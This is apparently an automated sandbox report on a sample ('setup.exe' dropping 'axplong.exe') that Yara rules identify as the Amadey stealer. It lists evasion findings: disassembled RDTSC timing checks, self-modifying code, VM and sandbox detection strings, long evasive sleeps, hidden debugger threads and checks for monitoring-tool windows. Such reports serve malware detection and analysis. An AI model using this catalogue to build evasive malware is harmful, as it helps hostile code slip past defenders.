Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF017C second address: 4EF01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F47D8E48272h 0x00000010 or ax, F6C8h 0x00000015 jmp 00007F47D8E4826Bh 0x0000001a popfd 0x0000001b mov bl, cl 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov dx, cx 0x00000023 jmp 00007F47D8E4826Ch 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b mov dx, ax 0x0000002e mov di, si 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+10h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F47D8E4826Bh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF01D8 second address: 4EF020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F47D8E3B0AFh 0x00000008 pop ecx 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F47D8E3B0B7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF020B second address: 4EF0223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48274h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0223 second address: 4EF0233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bh, 2Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0233 second address: 4EF026D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 7FE5F4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov si, 03B7h 0x0000000d popad 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F47D8E48276h 0x0000001a adc ch, FFFFFFD8h 0x0000001d jmp 00007F47D8E4826Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF026D second address: 4EF02E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F47D8E3B0B9h 0x00000014 or eax, 31A7DED6h 0x0000001a jmp 00007F47D8E3B0B1h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F47D8E3B0B0h 0x00000026 sbb esi, 32CCB4F8h 0x0000002c jmp 00007F47D8E3B0ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF02E4 second address: 4EF02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF02EA second address: 4EF034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47D8E3B0ABh 0x00000017 or ch, 0000006Eh 0x0000001a jmp 00007F47D8E3B0B9h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F47D8E3B0B0h 0x00000026 or eax, 7AC560E8h 0x0000002c jmp 00007F47D8E3B0ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF034E second address: 4EF038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 598Ah 0x00000007 pushfd 0x00000008 jmp 00007F47D8E4826Bh 0x0000000d add eax, 3A82C82Eh 0x00000013 jmp 00007F47D8E48279h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test esi, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF038C second address: 4EF0392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0392 second address: 4EF045F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 64F2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F484B3064DFh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pushfd 0x00000013 jmp 00007F47D8E48272h 0x00000018 add eax, 2261A808h 0x0000001e jmp 00007F47D8E4826Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 movsx edi, ax 0x00000028 popad 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 pushad 0x00000031 mov di, si 0x00000034 mov ax, BF49h 0x00000038 popad 0x00000039 je 00007F484B3064B3h 0x0000003f jmp 00007F47D8E48274h 0x00000044 mov edx, dword ptr [esi+44h] 0x00000047 jmp 00007F47D8E48270h 0x0000004c or edx, dword ptr [ebp+0Ch] 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F47D8E4826Eh 0x00000056 and ah, FFFFFFF8h 0x00000059 jmp 00007F47D8E4826Bh 0x0000005e popfd 0x0000005f movzx esi, bx 0x00000062 popad 0x00000063 test edx, 61000000h 0x00000069 jmp 00007F47D8E4826Bh 0x0000006e jne 00007F484B3064ACh 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F47D8E48275h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF045F second address: 4EF0502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E3B0B7h 0x00000009 adc ah, FFFFFFCEh 0x0000000c jmp 00007F47D8E3B0B9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 test byte ptr [esi+48h], 00000001h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F47D8E3B0B3h 0x00000020 sbb cx, 03DEh 0x00000025 jmp 00007F47D8E3B0B9h 0x0000002a popfd 0x0000002b jmp 00007F47D8E3B0B0h 0x00000030 popad 0x00000031 jne 00007F484B2F9264h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F47D8E3B0B7h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0502 second address: 4EF0553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F47D8E48276h 0x00000015 jmp 00007F47D8E48275h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0812 second address: 4EE08B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F47D8E3B0B3h 0x0000000b xor cx, 66BEh 0x00000010 jmp 00007F47D8E3B0B9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F47D8E3B0AEh 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F47D8E3B0B1h 0x00000027 xor cx, 23A6h 0x0000002c jmp 00007F47D8E3B0B1h 0x00000031 popfd 0x00000032 mov edx, esi 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F47D8E3B0AAh 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d call 00007F47D8E3B0AEh 0x00000042 mov ax, CF51h 0x00000046 pop eax 0x00000047 movsx ebx, ax 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08B5 second address: 4EE08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08B9 second address: 4EE08BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08BF second address: 4EE08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08C5 second address: 4EE08C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08C9 second address: 4EE08F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E48275h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08F6 second address: 4EE0906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0906 second address: 4EE0954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov bl, 4Ch 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007F47D8E48275h 0x00000015 or cx, 7286h 0x0000001a jmp 00007F47D8E48271h 0x0000001f popfd 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebx, 00000000h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c mov edx, 1973281Ah 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0954 second address: 4EE0982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 jmp 00007F47D8E3B0AAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 mov cx, 49E9h 0x00000018 popad 0x00000019 je 00007F484B300AC2h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov dx, EC34h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0982 second address: 4EE0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0995 second address: 4EE0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0999 second address: 4EE09DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F47D8E48275h 0x00000014 mov ecx, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F47D8E48278h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE09DB second address: 4EE09EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE09EA second address: 4EE09F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE09F0 second address: 4EE0A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F484B300A48h 0x00000011 pushad 0x00000012 mov cl, 00h 0x00000014 mov bx, 5B84h 0x00000018 popad 0x00000019 test byte ptr [77436968h], 00000002h 0x00000020 jmp 00007F47D8E3B0B3h 0x00000025 jne 00007F484B300A33h 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F47D8E3B0B4h 0x00000032 sub al, 00000068h 0x00000035 jmp 00007F47D8E3B0ABh 0x0000003a popfd 0x0000003b pushad 0x0000003c push eax 0x0000003d pop edi 0x0000003e mov eax, 13FCA6F1h 0x00000043 popad 0x00000044 popad 0x00000045 mov edx, dword ptr [ebp+0Ch] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov di, BFDCh 0x0000004f push edx 0x00000050 pop eax 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0A6B second address: 4EE0B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F47D8E4826Eh 0x00000011 adc ax, 0028h 0x00000016 jmp 00007F47D8E4826Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F47D8E48278h 0x00000022 sbb al, FFFFFF88h 0x00000025 jmp 00007F47D8E4826Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ecx, edi 0x00000030 mov si, di 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 pushad 0x00000036 mov edx, 22F91ECEh 0x0000003b pushfd 0x0000003c jmp 00007F47D8E4826Fh 0x00000041 sub esi, 2F50D77Eh 0x00000047 jmp 00007F47D8E48279h 0x0000004c popfd 0x0000004d popad 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F47D8E48278h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B25 second address: 4EE0B34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B34 second address: 4EE0B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 sub eax, 55E4A6EEh 0x0000000f jmp 00007F47D8E48279h 0x00000014 popfd 0x00000015 mov eax, 65277277h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007F47D8E4826Dh 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov al, bh 0x00000029 mov di, si 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B87 second address: 4EE0B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 21h 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+14h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B9A second address: 4EE0B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B9E second address: 4EE0BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0BA4 second address: 4EE0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 1FEAA8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 1FE9EC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 43ADE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 56EAA8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 56E9EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 7AADE1 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04F600B8 rdtsc 0_2_04F600B8
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 867 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1178 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 436 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 837 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1182 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 483 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4568 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3412 Thread sleep count: 867 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3412 Thread sleep time: -1734867s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3728 Thread sleep count: 1178 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3728 Thread sleep time: -2357178s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 716 Thread sleep count: 436 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 716 Thread sleep time: -13080000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2016 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5232 Thread sleep count: 837 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5232 Thread sleep time: -1674837s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1280 Thread sleep count: 1182 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1280 Thread sleep time: -2365182s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2936 Thread sleep count: 483 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2936 Thread sleep time: -966483s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: axplong.exe, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM)
Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.2129130568.0000000000389000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2157885886.00000000006F9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2166485787.00000000006F9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\setup.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_04F00130 Start: 04F001A2 End: 04F00185 4_2_04F00130
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04F600B8 rdtsc 0_2_04F600B8
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0053645B mov eax, dword ptr fs:[00000030h] 4_2_0053645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0053A1C2 mov eax, dword ptr fs:[00000030h] 4_2_0053A1C2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: axplong.exe, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: PProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0051D312 cpuid 4_2_0051D312
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0051CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 4_2_0051CB1A

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 3.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.setup.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2188818191.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2126010864.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
